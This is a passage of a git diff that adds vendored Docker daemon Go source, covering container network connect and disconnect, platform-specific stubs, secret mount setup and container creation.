+	createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS)
+	if err != nil {
+		return err
+	}
+
+	endpointName := strings.TrimPrefix(container.Name, "/")
+	ep, err := n.CreateEndpoint(endpointName, createOptions...)
+	if err != nil {
+		return err
+	}
+	defer func() {
+		if err != nil {
+			if e := ep.Delete(false); e != nil {
+				logrus.Warnf("Could not rollback container connection to network %s", idOrName)
+			}
+		}
+	}()
+	container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{
+		EndpointSettings: endpointConfig,
+		IPAMOperational:  operIPAM,
+	}
+	if _, ok := container.NetworkSettings.Networks[n.ID()]; ok {
+		delete(container.NetworkSettings.Networks, n.ID())
+	}
+
+	if err := daemon.updateEndpointNetworkSettings(container, n, ep); err != nil {
+		return err
+	}
+
+	if sb == nil {
+		options, err := daemon.buildSandboxOptions(container)
+		if err != nil {
+			return err
+		}
+		sb, err = controller.NewSandbox(container.ID, options...)
+		if err != nil {
+			return err
+		}
+
+		container.UpdateSandboxNetworkSettings(sb)
+	}
+
+	joinOptions, err := container.BuildJoinOptions(n)
+	if err != nil {
+		return err
+	}
+
+	if err := ep.Join(sb, joinOptions...); err != nil {
+		return err
+	}
+
+	if !container.Managed {
+		// add container name/alias to DNS
+		if err := daemon.ActivateContainerServiceBinding(container.Name); err != nil {
+			return fmt.Errorf("Activate container service binding for %s failed: %v", container.Name, err)
+		}
+	}
+
+	if err := container.UpdateJoinInfo(n, ep); err != nil {
+		return fmt.Errorf("Updating join info failed: %v", err)
+	}
+
+	container.NetworkSettings.Ports = getPortMapInfo(sb)
+
+	daemon.LogNetworkEventWithAttributes(n, "connect", map[string]string{"container": container.ID})
+	networkActions.WithValues("connect").UpdateSince(start)
+	return nil
+}
+
+// ForceEndpointDelete deletes an endpoint from a network forcefully
+func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error {
+	n, err := daemon.FindNetwork(networkName)
+	if err != nil {
+		return err
+	}
+
+	ep, err := n.EndpointByName(name)
+	if err != nil {
+		return err
+	}
+	return ep.Delete(true)
+}
+
+func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n libnetwork.Network, force bool) error {
+	var (
+		ep   libnetwork.Endpoint
+		sbox libnetwork.Sandbox
+	)
+
+	s := func(current libnetwork.Endpoint) bool {
+		epInfo := current.Info()
+		if epInfo == nil {
+			return false
+		}
+		if sb := epInfo.Sandbox(); sb != nil {
+			if sb.ContainerID() == container.ID {
+				ep = current
+				sbox = sb
+				return true
+			}
+		}
+		return false
+	}
+	n.WalkEndpoints(s)
+
+	if ep == nil && force {
+		epName := strings.TrimPrefix(container.Name, "/")
+		ep, err := n.EndpointByName(epName)
+		if err != nil {
+			return err
+		}
+		return ep.Delete(force)
+	}
+
+	if ep == nil {
+		return fmt.Errorf("container %s is not connected to the network", container.ID)
+	}
+
+	if err := ep.Leave(sbox); err != nil {
+		return fmt.Errorf("container %s failed to leave network %s: %v", container.ID, n.Name(), err)
+	}
+
+	container.NetworkSettings.Ports = getPortMapInfo(sbox)
+
+	if err := ep.Delete(false); err != nil {
+		return fmt.Errorf("endpoint delete failed for container %s on network %s: %v", container.ID, n.Name(), err)
+	}
+
+	delete(container.NetworkSettings.Networks, n.Name())
+
+	if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed {
+		if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil {
+			logrus.Warnf("error detaching from network %s: %v", n.Name(), err)
+			if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil {
+				logrus.Warnf("error detaching from network %s: %v", n.ID(), err)
+			}
+		}
+	}
+
+	return nil
+}
+
+func (daemon *Daemon) initializeNetworking(container *container.Container) error {
+	var err error
+
+	if container.HostConfig.NetworkMode.IsContainer() {
+		// we need to get the hosts files from the container to join
+		nc, err := daemon.getNetworkedContainer(container.ID, container.HostConfig.NetworkMode.ConnectedContainer())
+		if err != nil {
+			return err
+		}
+		initializeNetworkingPaths(container, nc)
+		container.Config.Hostname = nc.Config.Hostname
+		container.Config.Domainname = nc.Config.Domainname
+		return nil
+	}
+
+	if container.HostConfig.NetworkMode.IsHost() {
+		if container.Config.Hostname == "" {
+			container.Config.Hostname, err = os.Hostname()
+			if err != nil {
+				return err
+			}
+		}
+	}
+
+	if err := daemon.allocateNetwork(container); err != nil {
+		return err
+	}
+
+	return container.BuildHostnameFile()
+}
+
+func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID string) (*container.Container, error) {
+	nc, err := daemon.GetContainer(connectedContainerID)
+	if err != nil {
+		return nil, err
+	}
+	if containerID == nc.ID {
+		return nil, fmt.Errorf("cannot join own network")
+	}
+	if !nc.IsRunning() {
+		err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID)
+		return nil, derr.NewRequestConflictError(err)
+	}
+	if nc.IsRestarting() {
+		return nil, errContainerIsRestarting(connectedContainerID)
+	}
+	return nc, nil
+}
+
+func (daemon *Daemon) releaseNetwork(container *container.Container) {
+	start := time.Now()
+	if daemon.netController == nil {
+		return
+	}
+	if container.HostConfig.NetworkMode.IsContainer() || container.Config.NetworkDisabled {
+		return
+	}
+
+	sid := container.NetworkSettings.SandboxID
+	settings := container.NetworkSettings.Networks
+	container.NetworkSettings.Ports = nil
+
+	if sid == "" || len(settings) == 0 {
+		return
+	}
+
+	var networks []libnetwork.Network
+	for n, epSettings := range settings {
+		if nw, err := daemon.FindNetwork(n); err == nil {
+			networks = append(networks, nw)
+		}
+
+		if epSettings.EndpointSettings == nil {
+			continue
+		}
+
+		cleanOperationalData(epSettings)
+	}
+
+	sb, err := daemon.netController.SandboxByID(sid)
+	if err != nil {
+		logrus.Warnf("error locating sandbox id %s: %v", sid, err)
+		return
+	}
+
+	if err := sb.Delete(); err != nil {
+		logrus.Errorf("Error deleting sandbox id %s for container %s: %v", sid, container.ID, err)
+	}
+
+	for _, nw := range networks {
+		if daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed {
+			if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil {
+				logrus.Warnf("error detaching from network %s: %v", nw.Name(), err)
+				if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil {
+					logrus.Warnf("error detaching from network %s: %v", nw.ID(), err)
+				}
+			}
+		}
+
+		attributes := map[string]string{
+			"container": container.ID,
+		}
+		daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes)
+	}
+	networkActions.WithValues("release").UpdateSince(start)
+}
+
+func errRemovalContainer(containerID string) error {
+	return fmt.Errorf("Container %s is marked for removal and cannot be connected or disconnected to the network", containerID)
+}
+
+// ConnectToNetwork connects a container to a network
+func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings) error {
+	if endpointConfig == nil {
+		endpointConfig = &networktypes.EndpointSettings{}
+	}
+	if !container.Running {
+		if container.RemovalInProgress || container.Dead {
+			return errRemovalContainer(container.ID)
+		}
+
+		n, err := daemon.FindNetwork(idOrName)
+		if err == nil && n != nil {
+			if err := daemon.updateNetworkConfig(container, n, endpointConfig, true); err != nil {
+				return err
+			}
+		} else {
+			container.NetworkSettings.Networks[idOrName] = &network.EndpointSettings{
+				EndpointSettings: endpointConfig,
+			}
+		}
+	} else if !daemon.isNetworkHotPluggable() {
+		return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network")
+	} else {
+		if err := daemon.connectToNetwork(container, idOrName, endpointConfig, true); err != nil {
+			return err
+		}
+	}
+	if err := container.ToDiskLocking(); err != nil {
+		return fmt.Errorf("Error saving container to disk: %v", err)
+	}
+	return nil
+}
+
+// DisconnectFromNetwork disconnects container from network n.
+func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, networkName string, force bool) error {
+	n, err := daemon.FindNetwork(networkName)
+	if !container.Running || (err != nil && force) {
+		if container.RemovalInProgress || container.Dead {
+			return errRemovalContainer(container.ID)
+		}
+		// In case networkName is resolved we will use n.Name()
+		// this will cover the case where network id is passed.
+		if n != nil {
+			networkName = n.Name()
+		}
+		if _, ok := container.NetworkSettings.Networks[networkName]; !ok {
+			return fmt.Errorf("container %s is not connected to the network %s", container.ID, networkName)
+		}
+		delete(container.NetworkSettings.Networks, networkName)
+	} else if err == nil && !daemon.isNetworkHotPluggable() {
+		return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network")
+	} else if err == nil {
+		if container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() {
+			return runconfig.ErrConflictHostNetwork
+		}
+
+		if err := daemon.disconnectFromNetwork(container, n, false); err != nil {
+			return err
+		}
+	} else {
+		return err
+	}
+
+	if err := container.ToDiskLocking(); err != nil {
+		return fmt.Errorf("Error saving container to disk: %v", err)
+	}
+
+	if n != nil {
+		attributes := map[string]string{
+			"container": container.ID,
+		}
+		daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes)
+	}
+	return nil
+}
+
+// ActivateContainerServiceBinding puts this container into load balancer active rotation and DNS response
+func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) error {
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		return err
+	}
+	sb := daemon.getNetworkSandbox(container)
+	if sb == nil {
+		return fmt.Errorf("network sandbox does not exist for container %s", containerName)
+	}
+	return sb.EnableService()
+}
+
+// DeactivateContainerServiceBinding remove this container fromload balancer active rotation, and DNS response
+func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error {
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		return err
+	}
+	sb := daemon.getNetworkSandbox(container)
+	if sb == nil {
+		return fmt.Errorf("network sandbox does not exist for container %s", containerName)
+	}
+	return sb.DisableService()
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go
new file mode 100644
index 0000000000..1653948de1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go
@@ -0,0 +1,46 @@
+// +build solaris
+
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/libnetwork"
+)
+
+func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
+	return nil, nil
+}
+
+func (daemon *Daemon) setupIpcDirs(container *container.Container) error {
+	return nil
+}
+
+func killProcessDirectly(container *container.Container) error {
+	return nil
+}
+
+func detachMounted(path string) error {
+	return nil
+}
+
+func isLinkable(child *container.Container) bool {
+	// A container is linkable only if it belongs to the default network
+	_, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()]
+	return ok
+}
+
+func enableIPOnPredefinedNetwork() bool {
+	return false
+}
+
+func (daemon *Daemon) isNetworkHotPluggable() bool {
+	return false
+}
+
+func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error {
+	return nil
+}
+
+func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go
new file mode 100644
index 0000000000..2296045765
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go
@@ -0,0 +1,281 @@
+// +build linux freebsd
+
+package daemon
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strconv"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/cloudflare/cfssl/log"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/links"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/libnetwork"
+	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/pkg/errors"
+)
+
+func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
+	var env []string
+	children := daemon.children(container)
+
+	bridgeSettings := container.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()]
+	if bridgeSettings == nil || bridgeSettings.EndpointSettings == nil {
+		return nil, nil
+	}
+
+	for linkAlias, child := range children {
+		if !child.IsRunning() {
+			return nil, fmt.Errorf("Cannot link to a non running container: %s AS %s", child.Name, linkAlias)
+		}
+
+		childBridgeSettings := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()]
+		if childBridgeSettings == nil || childBridgeSettings.EndpointSettings == nil {
+			return nil, fmt.Errorf("container %s not attached to default bridge network", child.ID)
+		}
+
+		link := links.NewLink(
+			bridgeSettings.IPAddress,
+			childBridgeSettings.IPAddress,
+			linkAlias,
+			child.Config.Env,
+			child.Config.ExposedPorts,
+		)
+
+		env = append(env, link.ToEnv()...)
+	}
+
+	return env, nil
+}
+
+func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) {
+	containerID := container.HostConfig.IpcMode.Container()
+	c, err := daemon.GetContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+	if !c.IsRunning() {
+		return nil, fmt.Errorf("cannot join IPC of a non running container: %s", containerID)
+	}
+	if c.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+	return c, nil
+}
+
+func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) {
+	containerID := container.HostConfig.PidMode.Container()
+	c, err := daemon.GetContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+	if !c.IsRunning() {
+		return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID)
+	}
+	if c.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+	return c, nil
+}
+
+func (daemon *Daemon) setupIpcDirs(c *container.Container) error {
+	var err error
+
+	c.ShmPath, err = c.ShmResourcePath()
+	if err != nil {
+		return err
+	}
+
+	if c.HostConfig.IpcMode.IsContainer() {
+		ic, err := daemon.getIpcContainer(c)
+		if err != nil {
+			return err
+		}
+		c.ShmPath = ic.ShmPath
+	} else if c.HostConfig.IpcMode.IsHost() {
+		if _, err := os.Stat("/dev/shm"); err != nil {
+			return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host")
+		}
+		c.ShmPath = "/dev/shm"
+	} else {
+		rootUID, rootGID := daemon.GetRemappedUIDGID()
+		if !c.HasMountFor("/dev/shm") {
+			shmPath, err := c.ShmResourcePath()
+			if err != nil {
+				return err
+			}
+
+			if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil {
+				return err
+			}
+
+			shmSize := container.DefaultSHMSize
+			if c.HostConfig.ShmSize != 0 {
+				shmSize = c.HostConfig.ShmSize
+			}
+			shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10)
+			if err := syscall.Mount("shm", shmPath, "tmpfs", uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil {
+				return fmt.Errorf("mounting shm tmpfs: %s", err)
+			}
+			if err := os.Chown(shmPath, rootUID, rootGID); err != nil {
+				return err
+			}
+		}
+
+	}
+
+	return nil
+}
+
+func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) {
+	if len(c.SecretReferences) == 0 {
+		return nil
+	}
+
+	localMountPath := c.SecretMountPath()
+	logrus.Debugf("secrets: setting up secret dir: %s", localMountPath)
+
+	defer func() {
+		if setupErr != nil {
+			// cleanup
+			_ = detachMounted(localMountPath)
+
+			if err := os.RemoveAll(localMountPath); err != nil {
+				log.Errorf("error cleaning up secret mount: %s", err)
+			}
+		}
+	}()
+
+	// retrieve possible remapped range start for root UID, GID
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	// create tmpfs
+	if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil {
+		return errors.Wrap(err, "error creating secret local mount path")
+	}
+	tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID)
+	if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil {
+		return errors.Wrap(err, "unable to setup secret mount")
+	}
+
+	for _, s := range c.SecretReferences {
+		if c.SecretStore == nil {
+			return fmt.Errorf("secret store is not initialized")
+		}
+
+		// TODO (ehazlett): use type switch when more are supported
+		if s.File == nil {
+			return fmt.Errorf("secret target type is not a file target")
+		}
+
+		targetPath := filepath.Clean(s.File.Name)
+		// ensure that the target is a filename only; no paths allowed
+		if targetPath != filepath.Base(targetPath) {
+			return fmt.Errorf("error creating secret: secret must not be a path")
+		}
+
+		fPath := filepath.Join(localMountPath, targetPath)
+		if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil {
+			return errors.Wrap(err, "error creating secret mount path")
+		}
+
+		logrus.WithFields(logrus.Fields{
+			"name": s.File.Name,
+			"path": fPath,
+		}).Debug("injecting secret")
+		secret := c.SecretStore.Get(s.SecretID)
+		if secret == nil {
+			return fmt.Errorf("unable to get secret from secret store")
+		}
+		if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil {
+			return errors.Wrap(err, "error injecting secret")
+		}
+
+		uid, err := strconv.Atoi(s.File.UID)
+		if err != nil {
+			return err
+		}
+		gid, err := strconv.Atoi(s.File.GID)
+		if err != nil {
+			return err
+		}
+
+		if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil {
+			return errors.Wrap(err, "error setting ownership for secret")
+		}
+	}
+
+	// remount secrets ro
+	if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil {
+		return errors.Wrap(err, "unable to remount secret dir as readonly")
+	}
+
+	return nil
+}
+
+func killProcessDirectly(container *container.Container) error {
+	if _, err := container.WaitStop(10 * time.Second); err != nil {
+		// Ensure that we don't kill ourselves
+		if pid := container.GetPID(); pid != 0 {
+			logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID))
+			if err := syscall.Kill(pid, 9); err != nil {
+				if err != syscall.ESRCH {
+					return err
+				}
+				e := errNoSuchProcess{pid, 9}
+				logrus.Debug(e)
+				return e
+			}
+		}
+	}
+	return nil
+}
+
+func detachMounted(path string) error {
+	return syscall.Unmount(path, syscall.MNT_DETACH)
+}
+
+func isLinkable(child *container.Container) bool {
+	// A container is linkable only if it belongs to the default network
+	_, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()]
+	return ok
+}
+
+func enableIPOnPredefinedNetwork() bool {
+	return false
+}
+
+func (daemon *Daemon) isNetworkHotPluggable() bool {
+	return true
+}
+
+func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error {
+	var err error
+
+	container.HostsPath, err = container.GetRootResourcePath("hosts")
+	if err != nil {
+		return err
+	}
+	*sboxOptions = append(*sboxOptions, libnetwork.OptionHostsPath(container.HostsPath))
+
+	container.ResolvConfPath, err = container.GetRootResourcePath("resolv.conf")
+	if err != nil {
+		return err
+	}
+	*sboxOptions = append(*sboxOptions, libnetwork.OptionResolvConfPath(container.ResolvConfPath))
+	return nil
+}
+
+func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
+	container.HostnamePath = nc.HostnamePath
+	container.HostsPath = nc.HostsPath
+	container.ResolvConfPath = nc.ResolvConfPath
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go
new file mode 100644
index 0000000000..d05f251e05
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_operations_windows.go
@@ -0,0 +1,59 @@
+// +build windows
+
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/libnetwork"
+)
+
+func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
+	return nil, nil
+}
+
+// getSize returns real size & virtual size
+func (daemon *Daemon) getSize(container *container.Container) (int64, int64) {
+	// TODO Windows
+	return 0, 0
+}
+
+func (daemon *Daemon) setupIpcDirs(container *container.Container) error {
+	return nil
+}
+
+// TODO Windows: Fix Post-TP5. This is a hack to allow docker cp to work
+// against containers which have volumes. You will still be able to cp
+// to somewhere on the container drive, but not to any mounted volumes
+// inside the container. Without this fix, docker cp is broken to any
+// container which has a volume, regardless of where the file is inside the
+// container.
+func (daemon *Daemon) mountVolumes(container *container.Container) error {
+	return nil
+}
+
+func detachMounted(path string) error {
+	return nil
+}
+
+func killProcessDirectly(container *container.Container) error {
+	return nil
+}
+
+func isLinkable(child *container.Container) bool {
+	return false
+}
+
+func enableIPOnPredefinedNetwork() bool {
+	return true
+}
+
+func (daemon *Daemon) isNetworkHotPluggable() bool {
+	return false
+}
+
+func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error {
+	return nil
+}
+
+func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
+}
diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go
new file mode 100644
index 0000000000..c71d14e5fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/create.go
@@ -0,0 +1,290 @@
+package daemon
+
+import (
+	"fmt"
+	"net"
+	"runtime"
+	"strings"
+	"time"
+
+	"github.com/pkg/errors"
+
+	"github.com/Sirupsen/logrus"
+	apierrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/runconfig"
+	volumestore "github.com/docker/docker/volume/store"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+// CreateManagedContainer creates a container that is managed by a Service
+func (daemon *Daemon) CreateManagedContainer(params types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) {
+	return daemon.containerCreate(params, true)
+}
+
+// ContainerCreate creates a regular container
+func (daemon *Daemon) ContainerCreate(params types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) {
+	return daemon.containerCreate(params, false)
+}
+
+func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) {
+	start := time.Now()
+	if params.Config == nil {
+		return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container")
+	}
+
+	warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false)
+	if err != nil {
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+	}
+
+	err = daemon.verifyNetworkingConfig(params.NetworkingConfig)
+	if err != nil {
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+	}
+
+	if params.HostConfig == nil {
+		params.HostConfig = &containertypes.HostConfig{}
+	}
+	err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares)
+	if err != nil {
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err
+	}
+
+	container, err := daemon.create(params, managed)
+	if err != nil {
+		return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err)
+	}
+	containerActions.WithValues("create").UpdateSince(start)
+
+	return containertypes.ContainerCreateCreatedBody{ID: container.ID, Warnings: warnings}, nil
+}
+
+// Create creates a new container from the given configuration with a given name.
+func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (retC *container.Container, retErr error) {
+	var (
+		container *container.Container
+		img       *image.Image
+		imgID     image.ID
+		err       error
+	)
+
+	if params.Config.Image != "" {
+		img, err = daemon.GetImage(params.Config.Image)
+		if err != nil {
+			return nil, err
+		}
+
+		if runtime.GOOS == "solaris" && img.OS != "solaris " {
+			return nil, errors.New("Platform on which parent image was created is not Solaris")
+		}
+		imgID = img.ID()
+	}
+
+	if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.mergeAndVerifyLogConfig(&params.HostConfig.LogConfig); err != nil {
+		return nil, err
+	}
+
+	if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil {
+		return nil, err
+	}
+	defer func() {
+		if retErr != nil {
+			if err := daemon.cleanupContainer(container, true, true); err != nil {
+				logrus.Errorf("failed to cleanup container on create error: %v", err)
+			}
+		}
+	}()
+
+	if err := daemon.setSecurityOptions(container, params.HostConfig); err != nil {
+		return nil, err
+	}
+
+	container.HostConfig.StorageOpt = params.HostConfig.StorageOpt
+
+	// Set RWLayer for container after mount labels have been set
+	if err := daemon.setRWLayer(container); err != nil {
+		return nil, err
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.setHostConfig(container, params.HostConfig); err != nil {
+		return nil, err
+	}
+
+	if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil {
+		return nil, err
+	}
+
+	var endpointsConfigs map[string]*networktypes.EndpointSettings
+	if params.NetworkingConfig != nil {
+		endpointsConfigs = params.NetworkingConfig.EndpointsConfig
+	}
+	// Make sure NetworkMode has an acceptable value. We do this to ensure
+	// backwards API compatibility.
+	container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig)
+
+	daemon.updateContainerNetworkSettings(container, endpointsConfigs)
+
+	if err := container.ToDisk(); err != nil {
+		logrus.Errorf("Error saving new container to disk: %v", err)
+		return nil, err
+	}
+	if err := daemon.Register(container); err != nil {
+		return nil, err
+	}
+	daemon.LogContainerEvent(container, "create")
+	return container, nil
+}
+
+func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) {
+	if ipcMode.IsHost() || pidMode.IsHost() || privileged {
+		return label.DisableSecOpt(), nil
+	}
+
+	var ipcLabel []string
+	var pidLabel []string
+	ipcContainer := ipcMode.Container()
+	pidContainer := pidMode.Container()
+	if ipcContainer != "" {
+		c, err := daemon.GetContainer(ipcContainer)
+		if err != nil {
+			return nil, err
+		}
+		ipcLabel = label.DupSecOpt(c.ProcessLabel)
+		if pidContainer == "" {
+			return ipcLabel, err
+		}
+	}
+	if pidContainer != "" {
+		c, err := daemon.GetContainer(pidContainer)
+		if err != nil {
+			return nil, err
+		}
+
+		pidLabel = label.DupSecOpt(c.ProcessLabel)
+		if ipcContainer == "" {
+			return pidLabel, err
+		}
+	}
+
+	if pidLabel != nil && ipcLabel != nil {
+		for i := 0; i < len(pidLabel); i++ {
+			if pidLabel[i] != ipcLabel[i] {
+				return nil, fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same")
+			}
+		}
+		return pidLabel, nil
+	}
+	return nil, nil
+}
+
+func (daemon *Daemon) setRWLayer(container *container.Container) error {
+	var layerID layer.ChainID
+	if container.ImageID != "" {
+		img, err := daemon.imageStore.Get(container.ImageID)
+		if err != nil {
+			return err
+		}
+		layerID = img.RootFS.ChainID()
+	}
+
+	rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt)
+
+	if err != nil {
+		return err
+	}
+	container.RWLayer = rwLayer
+
+	return nil
+}
+
+// VolumeCreate creates a volume with the specified name, driver, and opts
+// This is called directly from the Engine API
+func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) {
+	if name == "" {
+		name = stringid.GenerateNonCryptoID()
+	}
+
+	v, err := daemon.volumes.Create(name, driverName, opts, labels)
+	if err != nil {
+		if volumestore.IsNameConflict(err) {
+			return nil, fmt.Errorf("A volume named %s already exists. Choose a different volume name.", name)
+		}
+		return nil, err
+	}
+
+	daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()})
+	apiV := volumeToAPIType(v)
+	apiV.Mountpoint = v.Path()
+	return apiV, nil
+}
+
+func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error {
+	if img != nil && img.Config != nil {
+		if err := merge(config, img.Config); err != nil {
+			return err
+		}
+	}
+	// Reset the Entrypoint if it is [""]
+	if len(config.Entrypoint) == 1 && config.Entrypoint[0] == "" {
+		config.Entrypoint = nil
+	}
+	if len(config.Entrypoint) == 0 && len(config.Cmd) == 0 {
+		return fmt.Errorf("No command specified")
+	}
+	return nil
+}
+
+// Checks if the client set configurations for more than one network while creating a container
+// Also checks if the IPAMConfig is valid
+func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error {
+	if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 {
+		return nil
+	}
+	if len(nwConfig.EndpointsConfig) == 1 {
+		for _, v := range nwConfig.EndpointsConfig {
+			if v != nil && v.IPAMConfig != nil {
+				if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil {
+					return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address))
+				}
+				if v.IPAMConfig.IPv6Address != "" {
+					n := net.ParseIP(v.IPAMConfig.IPv6Address)
+					// if the address is an invalid network address (ParseIP == nil) or if it is
+					// an IPv4 address (To4() != nil), then it is an invalid IPv6 address
+					if n == nil || n.To4() != nil {
